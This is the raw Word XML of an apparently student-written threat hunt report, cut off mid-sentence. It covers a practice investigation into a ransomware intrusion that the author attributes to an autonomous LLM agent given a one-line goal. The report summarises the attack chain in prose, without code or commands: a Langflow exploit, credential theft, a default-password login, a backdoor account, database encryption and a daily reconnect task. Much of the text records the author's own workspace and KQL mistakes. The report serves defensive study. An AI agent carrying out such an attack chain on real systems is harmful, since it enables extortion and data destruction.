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500645" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>THREAT HUNT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D564A" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>JadePuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Agentic Ransomware Intrusion on the Flowforge Estate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB42AD4" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>Workspace: law-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>huntpractice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t xml:space="preserve">Sentinel)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="595959"/>
        </w:rPr>
        <w:t>|   Hosts: ff-lf-01, ff-minio-01, ff-nacos-01, ff-db-01   |   Incident window: 2026-07-30, 19:20–19:38 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDBC79B" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00E05751">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="BFBFBF"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06854ED1" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432D62AB" w14:textId="6246E3B3" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This was my first time hunting an incident of this size, and it turned out to be a lot bigger than the "routine" framing in the alert brief suggested. Working backward through the logs, I was able to piece together that on 30 July 2026 the Flowforge estate was compromised end to end in under twenty minutes and, as far as I can tell from the evidence, not by a person typing commands at all, but by an autonomous LLM agent acting on its own after a single instruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2F238C" w14:textId="0F3E80A2" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In plain terms, here is what I found happened: an attacker (or rather, an AI agent working on an attacker's behalf) got in through an unpatched flaw in Langflow (CVE-2025-3248) on the host ff-lf-01, stole credentials sitting on that same host, scanned the rest of the internal network, got into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MinIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it was still using its out</w:t>
      </w:r>
      <w:r w:rsidR="0020614E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="0020614E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="0020614E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">box default password, pulled down a file full of more secrets, forged its way into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nacos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (failing once, then fixing its own mistake and trying again), created a hidden backdoor account for itself, and finally encrypted and deleted data in the MySQL database before dropping a ransom note. I also found a scheduled task that quietly reconnects the attacker's </w:t>
      </w:r>
      <w:r w:rsidR="0020614E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remote-control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> channel once a day, which as I understand it means the problem doesn't go away just by killing the original process or rebooting the box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E737B25" w14:textId="30822C2B" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>One thing that stood out to me, and that I want to flag clearly even though I'm still new to reasoning about this: a human only appears once in this entire chain at the very start, giving the agent a one-line goal ("Gain access to the Flowforge estate, locate and encrypt the most business-critical datastore, and leave payment instructions"). Everything after that, including the agent noticing and correcting its own mistake partway through, happened without anyone steering it. I'm calling this "human-tasked" rather than fully autonomous or fully human-driven, but I'd welcome a second opinion on that framing since it's not a distinction I'd had to make before this hunt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F47E047" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Scope and Data Sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373F996" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Workspace: law-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>huntpractice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Microsoft Sentinel / Log Analytics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133A914A" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hosts in scope: ff-lf-01 (Langflow, entry point), ff-minio-01 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MinIO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), ff-nacos-01 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nacos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), ff-db-01 (MySQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E47449" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tables used: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinuxProcess_CL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LinuxNetwork_CL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LinuxAuth_CL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LinuxAudit_CL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LinuxFile_CL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LinuxShellHistory_CL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LinuxSystem_CL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LinuxContainer_CL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LLMAgentLogs_CL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, Syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4DFB64" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Time window: 2026-07-30, approximately 19:20–19:38 UTC for the primary chain; persistence evidence spans 2026-07-29 into 2026-07-30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB23A97" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Investigation Notes: Getting Oriented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697E9815" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I want to be upfront that a big chunk of the time I spent on this hunt had nothing to do with the actual attack — it was spent just trying to figure out where the data even lived. I'm still learning my way around Sentinel and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Advanced Hunting, and this hunt taught me that "finding the right workspace" is apparently its own skill, separate from knowing what to do once you're there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389D46C1" w14:textId="05F16592" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The brief gave me four hostnames (ff-lf-01, ff-minio-01, ff-nacos-01, ff-db-01) and a workspace name, so I assumed that was enough to just start querying. It wasn't. The workspace I ended up in first was </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> large, shared tenant used for a lot of unrelated coursework hundreds of accounts and dozens of VMs that had nothing to do with Flowforge. I didn't know that yet, though all I saw was that my query for the four hostnames came back completely empty, and my first instinct was to assume I'd </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>typo’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> something or that the hosts simply weren't in the data yet, rather than that I was pointed at the wrong workspace entirely. That's a mistake I'll know to check for earlier next time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B02DE3" w14:textId="58904A4B" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">While I was still assuming I was in the right place, I went down a real rabbit hole with a device group called "Greenfield hosts," which also happened to have exactly four machines in it. I got briefly excited that I'd found my four hosts under different names, until I </w:t>
      </w:r>
      <w:r w:rsidR="0020614E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>checked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the device details and realized the platforms were mixed Windows and Linux and most of them weren't even onboarded meaning there was no real telemetry behind them at all. Lesson learned: matching on "same number of hosts" isn't the same as confirming it's the right environment, and I should have checked platform and onboarding status a lot sooner than I did.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD13C9" w14:textId="3AA896D2" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:r w:rsidR="0020614E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>got</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> me unstuck was going back to whoever wrote the brief and asking for the exact workspace name, host list, and time window in writing, instead of continuing to guess inside the portal. Even then I fumbled the workspace name a couple of times before I got it right it's law-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>huntpractice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, all lowercase, and I'd been trying variations of the capitalization and even one name that didn't exist at all. I didn't realize at the time that being in the wrong workspace doesn't throw an error in Sentinel it just quietly gives you results from wherever you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actually are</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which looks exactly like "there's no data" if you're not paying close attention to what workspace is selected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4CFA4F" w14:textId="79F27C02" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Once I was finally in the correct workspace, I hit a second problem that took me embarrassingly long to figure out: the time range picker in the Logs screen sits outside the actual KQL query and filters on top of it silently. This happened to me twice once near the start, and once again later in the hunt when a query that had worked minutes earlier suddenly came back with a count of zero, on a table I already knew had data in it. Both times I assumed something was broken with my query or the connection, when really the date picker was quietly restricting everything to "today" or "last 24 hours" underneath whatever I'd typed. Widening that range fixed it instantly both times, but I clearly need to make checking that picker a habit before I start debugging anything else.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2B7EF1" w14:textId="77777777" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">On top of all that, I also ran into a handful of smaller KQL mistakes that are probably obvious to anyone more experienced than me: I tried to use a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>minute(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) function that doesn't actually exist in KQL (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>datetime_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>part</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is the correct one), I tried to pass a plain string into a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>between(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) clause when it needed a proper </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>datetime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) value, and at least one query failed to parse because of a stray character that must have snuck in during copy-paste. None of these were hard to fix once someone pointed them out, but they each cost me a query cycle and a bit of confidence while I was working through them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1C004" w14:textId="6F878679" w:rsidR="00E05751" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">I'm including all of this in the report, even though it's a little embarrassing, because I think it's an honest reflection of where the difficulty </w:t>
      </w:r>
      <w:r w:rsidR="007F6034">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
